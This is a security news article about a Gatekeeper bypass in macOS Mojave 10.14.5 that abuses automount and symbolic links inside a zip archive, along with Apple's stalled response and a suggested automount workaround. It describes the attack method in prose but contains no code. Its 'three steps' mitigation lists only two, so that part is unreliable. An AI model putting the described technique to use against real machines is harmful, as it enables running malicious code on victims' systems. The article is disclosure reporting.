- An Italian researcher demonstrates a security vulnerability that allows hackers to bypass Gatekeeper.
- The researcher has publicly released the PoC code and a video, but Apple hasn’t released a fix yet.
- Apple engineers have included a relevant fix in their previous patch, but it was probably not effective enough.
According to an Italian security researcher named Filippo Cavallarin, macOS Mojave 10.14.5 and older are vulnerable to an arbitrary code execution flaw that Apple denies to consider. The specific vulnerability allows a hacker to bypass Gatekeeper, which is the macOS built-in defense tool, and execute whatever they want without worrying about certificate verification or any other validations. Cavallarin has discovered that it is possible to abuse the macOS automount functionality that treats external drives and networks as safe locations, and combine it with symbolic links to run any code without poking the Gatekeeper.
To demonstrate the vulnerability the researcher has created a zip archive that contains symbolic links pointing to automount endpoints that he controls. This file can be sent to the victim, downloaded onto the target system, extracted and followed. The symlink takes the victim to a location that is controlled by the attacker and was never checked by the Gatekeeper, and this means that the hacker would be able to do whatever they want, including the execution of malicious code. The following short video demonstrates exactly how that scenario would unfold in reality.
While the proof of concept code is pretty straight forward and was made available to Apple since February 22, 2019, the company has failed to fix the issue although they initially accepted the report as valid. On May 15, 2019, Apple started to completely disregard the researcher’s messages that warned them of the approaching disclosure deadline, so here we are. As there is no fix for this vulnerability yet, the only solution for macOS users who are worried about their security is to disable the automount functionality in their system. To do this, the researcher has listed the following three steps:
- Edit /etc/auto_master as root
- Comment the line beginning with ‘/net’
While the exploit method of the particular vulnerability seems legit, there’s some confusion stemming from the 10.14.4 release notes. In the “DesktopServices” fixes section, there’s the CVE-2019-8589 that promises improved checks that prevent malicious applications from bypassing Gatekeeper checks. Are those improvements not enough to mitigate the problem described by the Italian researcher, or has he missed the fix and is falsely claiming the disclosure of an unpatched flaw? Since he has clarified that he used macOS X version 10.14.5 at the beginning of his report, I am choosing to rule out the possibility of the latter being the case here. Most probably, Apple engineers have thought they fixed it, but they haven’t.